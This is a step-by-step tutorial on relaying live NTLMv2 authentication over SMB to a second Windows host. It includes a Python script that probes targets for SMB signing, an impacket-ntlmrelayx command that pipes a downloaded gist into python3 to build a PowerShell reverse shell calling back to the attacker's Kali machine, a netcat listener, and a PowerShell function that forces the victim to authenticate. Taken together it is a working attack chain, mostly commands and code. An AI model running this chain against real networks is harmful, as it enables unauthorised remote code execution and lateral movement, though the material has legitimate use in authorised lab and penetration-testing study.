Relaying NTLMv2 authentication from one machine to another.

We assume that the user of the current machine may have local administrator privileges on another machine, and that we cannot crack the captured NTLMv2 response (for example because the password is strong). A Net-NTLMv2 challenge/response cannot be replayed later or used for pass-the-hash, but while the user is authenticating we can forward that live authentication to the other machine in what is known as a relay attack. Two conditions must hold for this to work: the target must not require SMB signing (domain controllers require it by default, workstations and member servers usually do not), and the target must be a different host from the one the authentication comes from, since Windows has blocked reflection back to the originating machine since MS08-068.
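Before starting the relay it is worth confirming that the target actually accepts unsigned SMB sessions. The script below is an added example, not code from the original page or from impacket: it sends a single SMB2 NEGOTIATE to the target and reads the SecurityMode flags from the reply, which is the same check that `nxc smb <targets> --gen-relay-list` performs in bulk. The placeholder target address, the script name and the constructed sample response are assumptions.

```python
"""Pre-flight check for Step 1: does the relay target require SMB signing?

Added example; it is not part of the original page or of impacket. ntlmrelayx
can only relay to an SMB server that does not *require* signing, because the
relayed session cannot sign traffic without the user's key. This script asks
the target directly via an SMB2 NEGOTIATE and parses the SecurityMode flags
from the response. The host used below and the sample response bytes are
constructed for illustration.
"""
import socket
import struct
import sys
import uuid

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000            # Command code of NEGOTIATE
SIGNING_ENABLED = 0x0001           # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002          # SMB2_NEGOTIATE_SIGNING_REQUIRED
DIALECTS = [0x0202, 0x0210, 0x0300, 0x0302]   # up to 3.0.2: no negotiate contexts needed
DIALECT_NAMES = {0x0202: "2.0.2", 0x0210: "2.1", 0x0300: "3.0", 0x0302: "3.0.2", 0x0311: "3.1.1"}
HEADER_FMT = "<4sHHIHHIIQIIQ16s"   # 64-byte SMB2 header


def smb2_header(command: int, flags: int = 0) -> bytes:
    """Build a 64-byte SMB2 header (MessageId 0, no session, zeroed signature)."""
    return struct.pack(HEADER_FMT, SMB2_MAGIC, 64, 0, 0, command, 1,
                       flags, 0, 0, 0, 0, 0, b"\x00" * 16)


def build_negotiate_request() -> bytes:
    """SMB2 NEGOTIATE request wrapped in the 4-byte NetBIOS session header used on TCP/445."""
    body = struct.pack(
        "<HHHHI16sQ",
        36,                  # StructureSize (fixed)
        len(DIALECTS),       # DialectCount
        SIGNING_ENABLED,     # SecurityMode: client can sign, does not require it
        0,                   # Reserved
        0,                   # Capabilities
        uuid.uuid4().bytes,  # ClientGuid
        0,                   # ClientStartTime (unused below 3.1.1)
    ) + struct.pack("<%dH" % len(DIALECTS), *DIALECTS)
    msg = smb2_header(SMB2_NEGOTIATE) + body
    return struct.pack(">I", len(msg)) + msg   # NetBIOS: type 0x00 + 24-bit length


def parse_negotiate_response(data: bytes) -> dict:
    """Extract dialect and signing flags from a NEGOTIATE response (NetBIOS header stripped)."""
    if len(data) < 70 or data[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 reply: SMB1-only server, non-SMB service, or truncated")
    status, command = struct.unpack_from("<IH", data, 8)
    if command != SMB2_NEGOTIATE or status != 0:
        raise ValueError(f"unexpected command {command:#06x} / NTSTATUS {status:#010x}")
    # The response body starts right after the 64-byte header:
    # StructureSize (always 65), SecurityMode, DialectRevision, ...
    structure_size, security_mode, dialect = struct.unpack_from("<HHH", data, 64)
    if structure_size != 65:
        raise ValueError(f"bad NEGOTIATE response StructureSize {structure_size}")
    required = bool(security_mode & SIGNING_REQUIRED)
    return {
        "dialect": DIALECT_NAMES.get(dialect, f"{dialect:#06x}"),
        "signing_enabled": bool(security_mode & SIGNING_ENABLED),
        "signing_required": required,
        "relayable": not required,   # the property ntlmrelayx needs
    }


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed mid-response")
        buf += chunk
    return buf


def probe_signing(host: str, port: int = 445, timeout: float = 5.0) -> dict:
    """Live check against a real host (needs network; the offline sample below is used for tests)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_negotiate_request())
        length = struct.unpack(">I", _recv_exact(sock, 4))[0] & 0x00FFFFFF
        return parse_negotiate_response(_recv_exact(sock, length))


def make_sample_response(security_mode: int, dialect: int = 0x0302) -> bytes:
    """Constructed NEGOTIATE response, shaped like a Windows reply, for offline use."""
    body = struct.pack("<HHHH16sIIIIQQHHI",
                       65, security_mode, dialect, 0, b"\x00" * 16,
                       0, 0x800000, 0x800000, 0x800000, 0, 0, 0x80, 0, 0)
    return smb2_header(SMB2_NEGOTIATE, flags=0x1) + body   # flags 0x1 = server-to-redir


if __name__ == "__main__":
    # python3 smb_signing_check.py 10.0.0.5      (10.0.0.5 is a placeholder target)
    result = probe_signing(sys.argv[1]) if len(sys.argv) > 1 else \
        parse_negotiate_response(make_sample_response(SIGNING_ENABLED))
    print(result)
    print("relay possible" if result["relayable"] else "signing required: relay to this host will fail")
```

Run it against $Other_PC_IP before Step 1; if it reports signing required, ntlmrelayx will authenticate successfully but every subsequent command will fail, so pick another target.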

[SMB Server] Steps for Relay attack using impacket-ntlmrelayx

Step 1: Start Relay server

We use impacket-ntlmrelayx and pass, as the command to execute on the target, a base64-encoded PowerShell reverse shell generated by the mkpsrevshell.py gist.

impacket-ntlmrelayx --no-http-server -smb2support -t $Other_PC_IP -c "$(curl -s https://gist.githubusercontent.com/tothi/ab288fb523a4b32b51a53e542d40fe58/raw/40ade3fb5e3665b82310c08d36597123c2e75ab4/mkpsrevshell.py | python3 - $IP_KALI 8080)"

Explanation:

$(curl -s ... | python3 - $IP_KALI 8080) downloads mkpsrevshell.py and runs it with your Kali IP and port; it prints a base64-encoded PowerShell reverse-shell one-liner that becomes the value of -c. Read the gist before piping it into python3: it is third-party code executed on your own box.

-t $Other_PC_IP: the relay target. The relayed user must be a local administrator there, otherwise the session is established but -c cannot execute anything.

-c "...": the command ntlmrelayx runs on the target once the relayed session is established.

--no-http-server: disables ntlmrelayx's HTTP listener. The victim will authenticate to us over SMB, so only the SMB server is needed.

-smb2support: makes ntlmrelayx's own SMB server accept SMB2 clients. Without it only SMB1 clients can connect, and modern Windows has SMB1 disabled, so the victim would never reach the relay.

Step 2: start a netcat listener

Start netcat on the port given to mkpsrevshell.py (8080 here) to catch the reverse shell from the other PC.

sudo rlwrap nc -lnvp 8080

# If the shell drops, start the listener again and re-trigger Step 3. 

Step 3: Triggering SMB authentication to the relay server

From our existing shell on the current machine, make it open an SMB connection to the Kali host; any UNC path on $IP_KALI will do, the share does not have to exist. The user's NTLM authentication is relayed to $Other_PC_IP, ntlmrelayx runs the -c command there, and the reverse shell arrives in the netcat listener.

After triggering the connection you will get a shell in the netcat listener. Check it!!😎
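The trigger for Step 3 from a PowerShell foothold on the current machine, as an added example that is not part of the original page. The attacker address and the share name relay are assumptions; the share does not have to exist, because any UNC access to the Kali host makes the SMB client authenticate as the current user.

```powershell
# Added example (not from the original page): trigger the SMB authentication
# that ntlmrelayx will relay. Assumptions: $KaliIP is the attacker's address
# and "relay" is an arbitrary share name; the share does not need to exist.
function Invoke-RelayTrigger {
    param(
        [Parameter(Mandatory)] [string] $KaliIP,
        [string] $Share = "relay"
    )

    # Fail early if TCP/445 on Kali is unreachable (host firewall, wrong VPN
    # interface): otherwise nothing reaches ntlmrelayx and you wait for a
    # shell that never comes.
    if (-not (Test-NetConnection -ComputerName $KaliIP -Port 445 -InformationLevel Quiet)) {
        Write-Warning "TCP/445 on $KaliIP is not reachable; check the Kali firewall/VPN."
        return $false
    }

    # Any UNC access makes the SMB client negotiate and authenticate as the
    # current user. ntlmrelayx takes that NTLM exchange and forwards it to the
    # target; this side then usually sees an error (access denied, network
    # path not found), which is expected and NOT a sign the relay failed.
    try {
        Get-ChildItem -Path "\\$KaliIP\$Share" -ErrorAction Stop | Out-Null
    } catch {
        Write-Host "Client-side SMB error (normal once the relay consumed the auth): $($_.Exception.Message)"
    }
    return $true
}

# Run as the user whose authentication should be relayed, e.g. from the foothold shell:
Invoke-RelayTrigger -KaliIP "10.10.14.5"   # placeholder attacker IP, replace with $IP_KALI
```

From a plain cmd.exe shell, `dir \\<IP_KALI>\relay` has the same effect. Judge success by the ntlmrelayx output (it reports the relayed user and whether authentication against the target succeeded) and by the netcat listener, not by the error the client prints.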

If you capture the authentication with the HTTP server instead (omit --no-http-server), Steps 1 and 2 stay the same; only the trigger in Step 3 changes to something that makes the victim request a URL on the Kali host, and you get the shell the same way.
